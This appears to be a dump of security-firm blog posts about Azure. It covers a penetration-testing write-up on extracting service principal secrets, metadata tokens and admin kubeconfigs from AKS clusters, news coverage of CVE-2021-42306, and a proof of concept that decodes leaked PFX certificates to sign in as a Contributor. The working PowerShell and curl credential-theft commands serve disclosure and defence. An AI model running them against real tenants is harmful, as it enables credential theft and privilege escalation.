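# Derive the managed ("MC_") resource group name from the cluster details
$resourceGroup = "tester"; $clusterName = "testCluster"; $location = "eastus"
"MC_{0}_{1}_{2}" -f $resourceGroup, $clusterName, $location   # MC_tester_testCluster_eastus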
Gathering Service Principal Credentials
First, we will cover clusters that are configured with a Service Principal credential. As part of the configuration process, Azure places the Service Principal credentials in cleartext into the “/etc/kubernetes/azure.json” file on the cluster. According to the Microsoft documentation, this is by design, and is done to allow the cluster to use the Service Principal credentials. There are legitimate uses of these credentials, but it always feels wrong finding them available in cleartext.
In order to get access to the azure.json file, we will need to run a command on the cluster to “cat” out the file from the VMSS instance and return the command output.
The VMSS command execution can be done via the following options:
- Az PowerShell – Invoke-AzVmssVMRunCommand
- Az CLI – az vmss run-command
- Azure REST APIs – Microsoft Documentation Page
The Az PowerShell method is what is used in Get-AzPasswords, but you could manually use any of the above methods.
In Get-AzPasswords, this command execution is done by using a local command file (.\tempscript) that is passed into the Invoke-AzVmssVMRunCommand function. The command output is then parsed with some PowerShell and exported to the output table for the Get-AzPasswords function.
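If you want to run the check by hand, a minimal sketch of the Az PowerShell approach looks like the following; the resource group, scale set name, and instance ID are illustrative placeholders.

# Write the command to a local script file, then run it on a VMSS instance
"cat /etc/kubernetes/azure.json" | Out-File -FilePath .\tempscript -Encoding ascii
Invoke-AzVmssVMRunCommand -ResourceGroupName "MC_tester_testCluster_eastus" -VMScaleSetName "aks-nodepool1-12345678-vmss" -InstanceId "0" -CommandId "RunShellScript" -ScriptPath ".\tempscript"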
Learn more about how to use Get-AzPasswords in my blog, Get-AzPasswords: Encrypting Automation Password Data.
Privilege Escalation Potential
There is a small issue here: Contributors on the subscription can gain access to a Service Principal credential that they are not the owner of. If the Service Principal has additional permissions, it could allow the contributor to escalate privileges.
In this example:
- User A creates a Service Principal (AKS-SP), generates a password for it, and retains the “Owner” role on the Service Principal in Azure AD
- User A creates the AKS cluster (Test cluster) and assigns it the Service Principal credentials
- User B runs commands to extract credentials from the VMSS instance that runs the AKS cluster
- User B now has cleartext credentials for a Service Principal (AKS-SP) that they do not have Owner rights on
This is illustrated in the diagram below.
For all of the above, assume that both User A and B have the Contributor role on the subscription, and no additional roles assigned on the Azure AD tenant. Additionally, this attack could extend to the VM Contributor role and other roles that can run commands on VMSS instances (Microsoft.Compute/virtualMachineScaleSets/virtualMachines/runCommand/action).
Gathering Managed Identity Credentials
If the AKS cluster is configured with a Managed Identity, we will have to use the metadata service to get a token. We have previously covered this general process in the following blogs:
- Gathering Bearer Tokens from Azure Services
- Lateral Movement in Azure App Services
- Azure Privilege Escalation Using Managed Identities
In this case, we will be using the VMSS command execution functionality to make a request to “http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/” (the metadata service is HTTP-only). This will return a JWT that is scoped to the management.azure.com domain.
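A minimal sketch of that request, issued through the same VMSS command execution channel (resource names are illustrative):

# The metadata service only answers requests from the instance itself, so curl runs via Run Command
'curl -s -H "Metadata:true" "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/"' | Out-File -FilePath .\tempscript -Encoding ascii
Invoke-AzVmssVMRunCommand -ResourceGroupName "MC_tester_testCluster_eastus" -VMScaleSetName "aks-nodepool1-12345678-vmss" -InstanceId "0" -CommandId "RunShellScript" -ScriptPath ".\tempscript"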
For the AKS functionality in Get-AzPasswords, we currently have the token scoped to management.azure.com. If you would like to generate tokens for other scopes (i.e., Key Vaults), you can either modify the function in the PowerShell code or run the VMSS commands separately. Right now, this is a pending issue on the MicroBurst GitHub, so it is on the radar for future updates.
At this point we can use the token to gather information about the environment by using the Get-AzDomainInfoREST function from MicroBurst, written by Josh Magri at NetSPI. Keep in mind that the Managed Identity may not have any real roles applied, so your mileage may vary with the token usage. Given the Key Vault integrations with AKS, you may also have luck using Get-AzKeyVaultKeysREST or Get-AzKeyVaultSecretsREST from the MicroBurst tools, but you will need to request a Key Vault scoped token.
Gathering kubectl Credentials
As a final addition to the AKS section of Get-AzPasswords, we have added the functionality to generate kubeconfig files for authenticating with the kubectl tool. These config files allow for ongoing administrator access to the AKS environment, so they’re great for persistence.
Generating the config files can be complicated. The Az PowerShell module does not natively support this action, but the Az CLI and REST APIs do. Since we want to keep all the actions in Get-AzPasswords compatible with the Az PowerShell cmdlets, we ended up using a token (generated with Get-AzAccessToken) and making calls out to the REST APIs to generate the configuration. This prevents us from needing the Az CLI as an additional dependency.
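A minimal sketch of that REST call, assuming an ARM-scoped token from an authenticated session; the subscription ID ($subId), resource names, and API version are illustrative and may differ in your environment.

$token = (Get-AzAccessToken).Token
$uri = "https://management.azure.com/subscriptions/$subId/resourceGroups/tester/providers/Microsoft.ContainerService/managedClusters/testCluster/listClusterAdminCredential?api-version=2021-05-01"
$resp = Invoke-RestMethod -Method Post -Uri $uri -Headers @{ Authorization = "Bearer $token" }
# The kubeconfig comes back Base64-encoded in the kubeconfigs array
[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($resp.kubeconfigs[0].value)) | Out-File .\kubeconfig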
Once the config files are created, you can replace your existing kubeconfig file on your testing system and you should have access to the AKS cluster. Ultimately, this will be dependent on the AKS cluster being available from your network location.
Conclusion
As a final note on these Get-AzPasswords additions, we have run all the privilege escalation scenarios past MSRC for review. They have confirmed that these issues (Cleartext Credentials, Non-Owner Credential Access, and Role/Service Boundary Crossing) are all expected behaviors of the AKS service in a subscription.
For the defenders reading this, Microsoft Defender for Cloud (formerly Azure Security Center) should have alerts for Get-AzPasswords activity, but you can specifically monitor for these indicators of compromise (IoCs) in your Azure subscription logs:
- VMSS Command Execution
- Issuing of Metadata tokens for Managed Identities
- Generation of kubeconfig files
For those that want to try this on their own AKS cluster, the Get-AzPasswords function is available as part of the MicroBurst toolkit.
Need help securing your Azure cloud environment? Learn more about NetSPI’s Azure Penetration Testing services.
[post_title] => How To Extract Credentials from Azure Kubernetes Service (AKS) [post_excerpt] => In this penetration testing blog, we explain how to extract credentials from the Azure Kubernetes Service (AKS) using the Contributor role permissions on an AKS cluster. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => extract-credentials-from-azure-kubernetes-service [to_ping] => [pinged] => [post_modified] => 2023-03-16 09:22:34 [post_modified_gmt] => 2023-03-16 14:22:34 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=27255 [menu_order] => 314 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [12] => WP_Post Object ( [ID] => 26753 [post_author] => 10 [post_date] => 2021-11-23 13:16:00 [post_date_gmt] => 2021-11-23 19:16:00 [post_content] =>On November 23, 2021, NetSPI Director Karl Fosaaen was featured in an article written by Iain Thomson for The Register. Read the full article below or online here.
Microsoft has fixed a flaw in Azure that, according to the infosec firm that found and privately reported the issue, could be exploited by a rogue user within an Azure Active Directory instance "to escalate up to a Contributor role."
"If access to the Azure Contributor role is achieved, the user would be able to create, manage, and delete all types of resources in the affected Azure subscription," NetSPI said of the vulnerability, labeled CVE-2021-42306.
Essentially, an employee at a company using Azure Active Directory, for instance, could end up exploiting this bug to ruin an IT department or CISO's month. Microsoft said last week it fixed the problem within Azure:
Some Microsoft services incorrectly stored private key data in the (keyCredentials) property while creating applications on behalf of their customers.
We have conducted an investigation and have found no evidence of malicious access to this data.
Microsoft Azure services affected by this issue have mitigated by preventing storage of clear text private key information in the keyCredentials property, and Azure AD has mitigated by preventing reading of clear text private key data that was previously added by any user or service in the UI or APIs.
"The discovery of this vulnerability," said NetSPI's Karl Fosaaen, who found the security hole, "highlights the importance of the shared responsibility model among cloud providers and customers. It’s vital for the security community to put the world’s most prominent technologies to the test."
[post_title] => The Register: Microsoft squashes Azure privilege-escalation bug [post_excerpt] => On November 23, 2021, NetSPI Director Karl Fosaaen was featured in an article written by Iain Thomson for The Register. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => the-register-microsoft-squashes-azure-privilege-escalation-bug [to_ping] => [pinged] => [post_modified] => 2022-12-16 10:51:42 [post_modified_gmt] => 2022-12-16 16:51:42 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=26753 [menu_order] => 341 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [13] => WP_Post Object ( [ID] => 26727 [post_author] => 10 [post_date] => 2021-11-18 18:47:00 [post_date_gmt] => 2021-11-19 00:47:00 [post_content] =>On November 18, 2021, NetSPI Director Karl Fosaaen was featured in an article written by Jay Ferron for ChannelPro Network. Read the full article below or online here.
Microsoft recently mitigated an information disclosure issue, CVE-2021-42306, to prevent private key data from being stored by some Azure services in the keyCredentials property of an Azure Active Directory (Azure AD) Application and/or Service Principal, and prevent reading of private key data previously stored in the keyCredentials property.
The keyCredentials property is used to configure an application’s authentication credentials. It is accessible to any user or service in the organization’s Azure AD tenant with read access to application metadata.
The property is designed to accept a certificate with public key data for use in authentication, but certificates with private key data could have also been incorrectly stored in the property. Access to private key data can lead to an elevation of privilege attack by allowing a user to impersonate the impacted Application or Service Principal.
Some Microsoft services incorrectly stored private key data in the (keyCredentials) property while creating applications on behalf of their customers. We have conducted an investigation and have found no evidence of malicious access to this data.
Microsoft Azure services affected by this issue have mitigated by preventing storage of clear text private key information in the keyCredentials property, and Azure AD has mitigated by preventing reading of clear text private key data that was previously added by any user or service in the UI or APIs.
As a result, clear text private key material in the keyCredentials property is inaccessible, mitigating the risks associated with storage of this material in the property.
As a precautionary measure, Microsoft is recommending customers using these services take action as described in “Affected products/services,” below. We are also recommending that customers who suspect private key data may have been added to credentials for additional Azure AD applications or Service Principals in their environments follow this guidance.
Affected products/services
Microsoft has identified the following platforms/services that stored their private keys in the public property. We have notified customers who have impacted Azure AD applications created by these services and notified them via Azure Service Health Notifications to provide remediation guidance specific to the services they use.
Product/Service | Microsoft’s Mitigation | Customer impact assessment and remediation |
---|---|---|
Azure Automation uses the Application and Service Principal keyCredential APIs when Automation Run-As Accounts are created | Azure Automation deployed an update to the service to prevent private key data in clear text from being uploaded to Azure AD applications. Run-As accounts created or renewed after 10/15/2021 are not impacted and do not require further action. | Automation Run As accounts created with an Azure Automation self-signed certificate between 10/15/2020 and 10/15/2021 that have not been renewed are impacted. Separately customers who bring their own certificates could be affected. This is regardless of the renewal date of the certificate. To identify and remediate impacted Azure AD applications associated with impacted Automation Run-As accounts, please navigate to this Github Repo. In addition, Azure Automation supports Managed Identities Support (GA announced on October 2021). Migrating to Managed Identities from Run-As will mitigate this issue. Please follow the guidance here to migrate. |
Azure Migrate service creates Azure AD applications to enable Azure Migrate appliances to communicate with the service’s endpoints. | Azure Migrate deployed an update to prevent private key data in clear text from being uploaded to Azure AD applications. Azure Migrate appliances that were registered after 11/02/2021 and had Appliance configuration manager version 6.1.220.1 and above are not impacted and do not require further action. | Azure Migrate appliances registered prior to 11/02/2021 and/or appliances registered after 11/02/2021 where auto-update was disabled could be affected by this issue. To identify and remediate any impacted Azure AD applications associated with Azure Migrate appliances, please navigate to this link. |
Azure Site Recovery (ASR) creates Azure AD applications to communicate with the ASR service endpoints. | Azure Site Recovery deployed an update to prevent private keydata from being uploaded to Azure AD applications. Customers using Azure Site Recovery’s preview experience “VMware to Azure Disaster Recovery” after 11/01/2021 are not impacted and do not require further action. | Customers who have deployed and registered the preview version of VMware to Azure DR experience with ASR before 11/01/2021 could be affected. To identify and remediate the impacted AAD Apps associated with Azure Site Recovery appliances, please navigate to this link. |
Azure AD applications and Service Principals [1] | Microsoft has blocked reading private key data as of 10/30/2021. | Follow the guidance available at aad-app-credential-remediation-guide to assess if your application key credentials need to be rotated. The guidance walks through the assessment steps to identify if private key information was stored in keyCredentials and provides remediation options for credential rotation. |
[1] This issue only affects Azure AD Applications and Service Principals where private key material in clear text was added to a keyCredential. Microsoft recommends taking precautionary steps to identify any additional instances of this issue in applications where you manage credentials and take remediation steps if impact is found.
What else can I do to audit and investigate applications for unexpected use?
Additionally, as a best practice, we recommend auditing and investigating applications for unexpected use:
- Audit the permissions that have been granted to the impacted entities (e.g., subscription access, roles, OAuth permissions, etc.) to assess impact in case the credentials were exposed. Refer to the Application permission section in the security operations guide.
- If you rotated the credential for your application/service principal, we suggest investigating for unexpected use of the impacted entity especially if it has high privilege permissions to sensitive resources. Additionally, review the security guidance on least privilege access for apps to ensure your applications are configured with least privilege access.
- Check sign-in logs, AAD audit logs and M365 audit logs, for anomalous activity like sign-ins from unexpected IP addresses.
- Customers who have Microsoft Sentinel deployed in their environment can leverage notebook/playbook/hunting queries to look for potentially malicious activities. Look for more guidance here.
- For more information refer to the security operations guidance.
Part of any robust security posture is working with researchers to help find vulnerabilities, so we can fix any findings before they are misused. We want to thank Karl Fosaaen of NetSPI who reported this vulnerability and Allscripts who worked with the Microsoft Security Response Center (MSRC) under Coordinated Vulnerability Disclosure (CVD) to help keep Microsoft customers safe.
[post_title] => ChannelPro Network: Azure Active Directory (AD) KeyCredential Property Information Disclosure [post_excerpt] => On November 18, 2021, NetSPI Director Karl Fosaaen was featured in an article written by Jay Ferron for ChannelPro Network. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => channelpro-network-azure-active-directory-ad-keycredential-property-information-disclosure [to_ping] => [pinged] => [post_modified] => 2022-12-16 10:51:43 [post_modified_gmt] => 2022-12-16 16:51:43 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=26727 [menu_order] => 344 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [14] => WP_Post Object ( [ID] => 26733 [post_author] => 10 [post_date] => 2021-11-18 17:26:00 [post_date_gmt] => 2021-11-18 23:26:00 [post_content] =>
On November 18, 2021, NetSPI Director Karl Fosaaen was featured in an article written by Pierluigi Paganini for Security Affairs. Read the full article below or online here.
Microsoft has recently addressed an information disclosure vulnerability, tracked as CVE-2021-42306, affecting Azure AD.
“An information disclosure vulnerability manifests when a user or an application uploads unprotected private key data as part of an authentication certificate keyCredential on an Azure AD Application or Service Principal (which is not recommended). This vulnerability allows a user or service in the tenant with application read access to read the private key data that was added to the application.” reads the advisory published by Microsoft. “Azure AD addressed this vulnerability by preventing disclosure of any private key values added to the application. Microsoft has identified services that could manifest this vulnerability, and steps that customers should take to be protected. Refer to the FAQ section for more information.”
The vulnerability was discovered by Karl Fosaaen from NetSPI, it received a CVSS score of 8.1. Fosaaen explained that due to a misconfiguration in Azure, Automation Account “Run as” credentials (PFX certificates) ended up being stored in clear text in Azure AD and anyone with access to information on App Registrations can access them.
An attacker could use these credentials to authenticate as the App Registration, typically as a Contributor on the subscription containing the Automation Account.
“This issue stems from the way the Automation Account “Run as” credentials are created when creating a new Automation Account in Azure. There appears to have been logic on the Azure side that stores the full PFX file in the App Registration manifest, versus the associated public key.” reads the analysis published by NetSPI.
An attacker can exploit this flaw to escalate privileges to Contributor of any subscription that has an Automation Account, then access resources in the affected subscriptions, including sensitive information stored in Azure services and credentials stored in key vaults.
The issue could be potentially exploited to disable or delete resources and take entire Azure tenants offline.
Microsoft addressed the flaw by preventing Azure services from storing clear text private keys in the keyCredentials property and by preventing users from reading any private key data that has been stored in clear text.
[post_title] => Security Affairs: Microsoft addresses a high-severity vulnerability in Azure AD [post_excerpt] => On November 18, 2021, NetSPI Director Karl Fosaaen was featured in an article written by Pierluigi Paganini for Security Affairs. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => security-affairs-microsoft-addresses-a-high-severity-vulnerability-in-azure-ad [to_ping] => [pinged] => [post_modified] => 2022-12-16 10:51:43 [post_modified_gmt] => 2022-12-16 16:51:43 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=26733 [menu_order] => 343 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [15] => WP_Post Object ( [ID] => 26728 [post_author] => 10 [post_date] => 2021-11-18 16:14:00 [post_date_gmt] => 2021-11-18 22:14:00 [post_content] =>On November 18, 2021, NetSPI Director Karl Fosaaen was featured in an article written by Kurt Mackie for Redmond. Read the full article below or online here.
Microsoft announced on Wednesday that it fixed an Azure Active Directory private key data storage gaffe that affects Azure application subscribers, but affected organizations nonetheless should carry out specific assessment and remediation tasks.
Affected organizations were notified via the Azure Service Health Notifications message center, Microsoft indicated.
"We have notified customers who have impacted Azure AD applications created by these services and notified them via Azure Service Health Notifications to provide remediation guidance specific to the services they use."
The applications requiring investigation include Azure Automation (when used with "Run-As Accounts"), Azure Migrate, Azure Site Recovery, and Azure AD Applications and Service Principals. Microsoft didn't find evidence that the vulnerability was exploited, but advised organizations to conduct audits and investigate Azure apps for any permissions that may have been granted.
Microsoft also urged IT pros to enforce least-privilege access for apps and check the "sign-in logs, AAD audit logs and M365 audit logs for anomalous activity like sign-ins from unexpected IP addresses."
Private Key Data Exposed
The problem, in essence, was that Microsoft's Azure app installation processes were including private key data in a property used for public keys. The issue was initially flagged as CVE-2021-42306, an information disclosure vulnerability associated with Azure AD's keyCredentials property. Any user in an Azure AD tenancy can read the keyCredentials property, Microsoft's announcement explained:
The keyCredentials property is used to configure an application's authentication credentials. It is accessible to any user or service in the organization's Azure AD tenant with read access to application metadata.
The keyCredentials property is supposed to just work with public keys, but it was possible to store private key data in it, too, and that's where the Microsoft Azure app install processes blundered.
"Some Microsoft services incorrectly stored private key data in the (keyCredentials) property while creating applications on behalf of their customers," Microsoft explained.
The Microsoft Security Response Center (MSRC) credited the discovery of the issue to "Karl Fosaaen of NetSPI who reported this vulnerability and Allscripts who worked with the Microsoft Security Response Center (MSRC) under Coordinated Vulnerability Disclosure (CVD) to help keep Microsoft customers safe," the announcement indicated.
Contributor Role Rights
The magnitude of the problem was explained in a NetSPI press release. NetSPI specializes in penetration testing and attack surface reduction services for organizations.
An exploit of the CVE-2021-42306 vulnerability could give an attacker Azure Contributor role rights, with the ability to "create, manage, and delete all types of resources in the affected Azure subscription," NetSPI explained. An attacker would have access to "all of the resources in the affected subscriptions," including "credentials stored in key vaults."
NetSPI's report on the vulnerability, written by Karl Fosaaen, NetSPI's practice director, described the response by the MSRC as "one of the fastest" he's seen. Fosaaen had initially sent his report to the MSRC on Oct. 7, 2021.
Fosaaen advised following MSRC's advice, but added a cautionary note.
"Although Microsoft has updated the impacted Azure services, I recommend cycling any existing Automation Account 'Run as' certificates," he wrote. "Because there was a potential exposure of these credentials, it is best to assume that the credentials may have been compromised."
Microsoft offers a script from this GitHub page that will check for affected apps, as noted by Microsoft Program Manager Merill Fernando in this Twitter post.
[post_title] => Redmond: Microsoft Fixes Azure Active Directory Issue Exposing Private Key Data [post_excerpt] => On November 18, 2021, NetSPI Director Karl Fosaaen was featured in an article written by Kurt Mackie for Redmond. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => redmond-microsoft-fixes-azure-active-directory-issue-exposing-private-key-data [to_ping] => [pinged] => [post_modified] => 2022-12-16 10:51:44 [post_modified_gmt] => 2022-12-16 16:51:44 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=26728 [menu_order] => 345 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [16] => WP_Post Object ( [ID] => 26730 [post_author] => 10 [post_date] => 2021-11-18 15:19:00 [post_date_gmt] => 2021-11-18 21:19:00 [post_content] =>On November 18, 2021, NetSPI Director Karl Fosaaen was featured in an article written by Octavio Mares for Information Security Newspaper. Read the full article below or online here.
This week, Microsoft reported the detection of a sensitive information leak vulnerability that affects many Azure Active Directory (AD) deployments. The flaw was tracked as CVE-2021-42306 and received a score of 8.1/10 according to the Common Vulnerability Scoring System (CVSS).
According to the report, incorrect configuration in Azure allows “Run As” credentials in the automation account to be stored in plain text, so any user with access to application registration information could access this information, including threat actors.
The flaw was identified by researchers at cybersecurity firm NetSPI, who mention that an attacker could exploit this condition to perform privilege escalation on any affected implementation. The risk is also present for credentials stored in key vaults and any information stored in Azure services, experts say.
Apparently, the flaw is related to the keyCredentials property, designed to configure authentication credentials for applications. Microsoft said: “Some Microsoft services incorrectly store private key data in keyCredentials while building applications on behalf of their customers. At the moment there is no evidence of malicious access to this data.”
The company notes that the vulnerability was fixed by preventing Azure services from storing private keys in plain text in keyCredentials, as well as preventing users from accessing any private key data incorrectly stored in this format: “Private keys in keyCredentials are inaccessible, which mitigates the risk associated with storing this information,” Microsoft concludes.
Microsoft also mentions that all Automation Run As accounts that were created with Azure Automation certificates between October 15, 2020 and October 15, 2021 are affected by this flaw. Azure Migrate services and customers who deployed the preview of the VMware-to-Azure disaster recovery experience with Azure Site Recovery (ASR) could also be vulnerable.
To learn more about information security risks, malware variants, vulnerabilities and information technologies, feel free to access the International Institute of Cyber Security (IICS) websites.
[post_title] => Information Security Newspaper: Very Critical Information Disclosure Vulnerability in Azure Active Directory (AD). Patch Immediately [post_excerpt] => On November 18, 2021, NetSPI Director Karl Fosaaen was featured in an article written by Kurt Mackie for Redmond. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => information-security-newspaper-very-critical-information-disclosure-vulnerability-in-azure-active-directory-ad-patch-immediately [to_ping] => [pinged] => [post_modified] => 2022-12-16 10:51:44 [post_modified_gmt] => 2022-12-16 16:51:44 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=26730 [menu_order] => 346 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [17] => WP_Post Object ( [ID] => 26710 [post_author] => 10 [post_date] => 2021-11-18 14:34:36 [post_date_gmt] => 2021-11-18 20:34:36 [post_content] =>On November 18, 2021, NetSPI Practice Director Karl Fosaaen was featured in an article on The Stack. Read the full article below or online here.
A critical Azure Active Directory vulnerability (CVE-2021-42306) left user credentials stored in easily accessible plain text – a bug that could have let attackers make themselves a contributor to the affected Azure AD subscription, creating, managing and deleting resources across the cloud-based IAM service; which, abused, hands a potentially terrifying amount of control to any bad actor who’s gained access.
The Azure Active Directory vulnerability resulted in private key data being stored in plaintext by four key Azure services in the keyCredentials property of an Azure AD application. (The keyCredentials property is used to configure an application’s authentication credentials. It is accessible to any user or service in the organization’s Azure AD tenant with read access to application metadata, Microsoft noted in its write-up.)
Azure Automation, Azure Migrate, Azure Site Recovery and Azure applications and Service Principals were all storing their private keys visibly in the public property, Microsoft admitted.
“Automation Account ‘Run as’ credentials (PFX certificates) were being stored in cleartext, in Azure Active Directory (AAD). These credentials were available to anyone with the ability to read information about App Registrations (typically most AAD users)” said attack surface management specialist NetSPI.
The bug was spotted and reported by security firm NetSPI’s practice director Karl Fosaaen.
(His technically detailed write-up can be seen here.)
Microsoft gave it a CVSS score of 8.1 and patched it on November 17 in an out-of-band security update.
Impacted Azure services have now deployed updates that prevent clear text private key data from being stored during application creation, and Azure AD deployed an update that prevents access to private key data that has previously been stored. NetSPI’s Fosaaen warned however that “although Microsoft has updated the impacted Azure services, I recommend cycling any existing Automation Account ‘Run as’ certificates. Because there was a potential exposure of these credentials, it is best to assume that the credentials may have been compromised.”
There’s no evidence that the bug has been publicly exploited and it would require basic authorisation, but for a motivated attacker it would have represented a significant weapon in their cloud-exploitation arsenal and raises questions about QA at Microsoft given the critical nature of the exposure.
Microsoft described the Azure Active Directory vulnerability in its security update as “an information disclosure vulnerability [that] manifests when a user or an application uploads unprotected private key data as part of an authentication certificate keyCredential on an Azure AD Application or Service Principal….
“This vulnerability allows a user or service in the tenant with application read access to read the private key data that was added to the application” it added.
In a separate blog by Microsoft Security Response Center the company noted that “access to private key data can lead to an elevation of privilege attack by allowing a user to impersonate the impacted Application or Service Principal” — something illustrated and automated by NetSPI’s Karl Fosaaen.
It’s not Azure’s first serious security issue this year: security researchers at Israel’s Wiz in August 2021 found a critical vulnerability in its flagship CosmosDB database that gave them full admin access for major Microsoft customers including several Fortune 500 multinationals. They warned at the time that the “series of flaws in a Cosmos DB feature created a loophole allowing any user to download, delete or manipulate a massive collection of commercial databases, as well as read/write access to the underlying architecture of Cosmos DB.”
[post_title] => The Stack: “Keys to the cloud” stored in plain text in Azure AD in major hyperscaler blooper [post_excerpt] => On November 18, 2021, NetSPI Practice Director Karl Fosaaen was featured in an article on The Stack. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => the-stack-keys-to-the-cloud-stored-in-plain-text-in-azure-ad-in-major-hyperscaler-blooper [to_ping] => [pinged] => [post_modified] => 2022-12-16 10:51:44 [post_modified_gmt] => 2022-12-16 16:51:44 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=26710 [menu_order] => 347 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [18] => WP_Post Object ( [ID] => 26684 [post_author] => 10 [post_date] => 2021-11-17 14:13:03 [post_date_gmt] => 2021-11-17 20:13:03 [post_content] =>Introduction
Occasionally, we find something in an environment that just looks off. It’s not always abundantly clear why it looks wrong, but clear that a deeper understanding is required. This was the case with seeing Base64 certificate data (“MII…” strings) stored with App Registration “manifests” in Azure Active Directory.
In this blog, we will share the technical details on how we found and reported CVE-2021-42306 (CredManifest) to Microsoft. In addition to Microsoft’s remediation guidance, we’ll explain the remediation steps organizations can take to protect their Azure environments.
So, what does this mean for your organization? Read our press release to explore the business impact of the issue.
TL;DR
Due to a misconfiguration in Azure, Automation Account “Run as” credentials (PFX certificates) were being stored in cleartext, in Azure Active Directory (AAD). These credentials were available to anyone with the ability to read information about App Registrations (typically most AAD users). These credentials could then be used to authenticate as the App Registration, typically as a Contributor on the subscription containing the Automation Account.
The Source of the Issue
This issue stems from the way the Automation Account “Run as” credentials are created when creating a new Automation Account in Azure. There appears to have been logic on the Azure side that stores the full PFX file in the App Registration manifest, versus the associated public key.
We can see this by creating a new Automation Account with a “Run as” account in our test tenant. As an integrated part of this process, we are assigning the Contributor role to the “Run as” account, so we will need to use an account with the Owner role to complete this step. We will use the “BlogExample” Automation Account as our example:
Take note that we are also selecting the “Create Azure Run As account” setting as “Yes” for this example. This will create a new service principal account that the Automation Account can use within running scripts. By default, this service principal will also be granted the Contributor role on the subscription that the Automation Account is created in.
We’ve previously covered Automation Accounts on the NetSPI technical blog, so hopefully this is all a refresher. For additional information on Azure Automation Accounts, read:
- Get-AzPasswords: Encrypting Automation Password Data
- Maintaining Azure Persistence via Automation Accounts
- Using Azure Automation Accounts to Access Key Vaults
Once the Automation and “Run as” Accounts are created, we can then see the new service principal in the App Registrations section of the Azure Active Directory blade in the Portal.
By selecting the display name, we can then see the details for the App Registration and navigate to the “Manifest” section. Within this section, we can see the “keyCredentials”.
The “value” parameter is the Base64 encoded string containing the PFX certificate file that can be used for authentication. Before we can authenticate as the App Registration, we will need to decode the Base64 data back into a PFX file.
Manual Extraction of the Credentials
For the proof of concept, we will copy the certificate data out of the manifest and convert it to a PFX file.
This can be done with two lines of PowerShell:
$testcred = "MIIJ/QIBAzCCC[Truncated]=" [IO.File]::WriteAllBytes("$PWD\BlogCert.pfx",[Convert]::FromBase64String($testcred))
This will decode the certificate data to BlogCert.pfx in your current directory.
Next, we will need to import the certificate to our local store. This can also be done with PowerShell (in a local administrator session):
Import-PfxCertificate -FilePath "$PWD\BlogCert.pfx" -CertStoreLocation Cert:\LocalMachine\My
Finally, we can use the newly installed certificate to authenticate to the Azure subscription as the App Registration. This will require us to know the Directory (Tenant) ID, App (Client) ID, and Certificate Thumbprint for the App Registration credentials. These can be found in the “Overview” menu for the App Registration and the Manifest.
In this example, we’ve cast these values to PowerShell variables ($thumbprint, $tenantID, $appId).
With these values available, we can then run the Add-AzAccount command to authenticate to the tenant.
Add-AzAccount -ServicePrincipal -Tenant $tenantID -CertificateThumbprint $thumbprint -ApplicationId $appId
As we can see, the results of Get-AzRoleAssignment for our App Registration shows that it has the Contributor role in the subscription.
Automating Extraction
Since we’re penetration testers and want to automate all our attacks, we wrote up a script to help identify additional instances of this issue in tenants. The PowerShell script uses the Graph API to gather the manifests from AAD and extract the credentials out to files.
The script itself is simple, but it uses the following logic (a minimal sketch follows the list):
- Get a token and query the following endpoint for App Registration information - “https://graph.microsoft.com/v1.0/myorganization/applications/”
- For each App Registration, check the “keyCredentials” value for data and write it to a file
- Use the Get-PfxData PowerShell function to validate that it’s a PFX file
- Delete any non-PFX files and log the display name and ID for affected App Registrations to a file for tracking
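The released version lives in MicroBurst, but a simplified sketch of the same logic might look like the following, assuming an authenticated Az PowerShell session; the file names and output format are illustrative.

# Query the Graph API for App Registrations and dump any keyCredentials data to disk
$token = (Get-AzAccessToken -ResourceUrl "https://graph.microsoft.com").Token
$apps = (Invoke-RestMethod -Uri "https://graph.microsoft.com/v1.0/myorganization/applications/" -Headers @{ Authorization = "Bearer $token" }).value
foreach ($app in $apps) {
    foreach ($cred in $app.keyCredentials) {
        if ($cred.key) {
            $file = "$PWD\$($app.id).pfx"
            [IO.File]::WriteAllBytes($file, [Convert]::FromBase64String($cred.key))
            # Keep the file only if it parses as a PFX; public-key-only entries will fail here
            try {
                Get-PfxData -FilePath $file -ErrorAction Stop | Out-Null
                "$($app.displayName),$($app.id)" | Out-File -Append .\AffectedApps.txt
            }
            catch { Remove-Item $file }
        }
    }
}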
Impact
For the proof of concept that I submitted to MSRC for this vulnerability, I also created a new user (noaccess) in my AAD tenant. This user did not have any additional roles applied to it, and I was able to use the account to browse to the AAD menu in the Portal and view the manifest for the App Registration.
By gaining access to the App Registration credential, my new user could then authenticate to the subscription as the Contributor role for the subscription. This is an impactful privilege escalation, as it would allow any user in this environment to escalate to Contributor of any subscription with an Automation Account.
For additional reference, Microsoft’s documentation for default user permissions indicates that this is expected behavior for all member users in AAD: https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/users-default-permissions.
Remediation Steps
Below is a detailed overview of how I remediated the issue in a client environment, prior to Microsoft’s fix:
When the “Run as” certificate has been renewed, the new certificate will have its own entry in the manifest. This value will be the public certificate of the new credential.
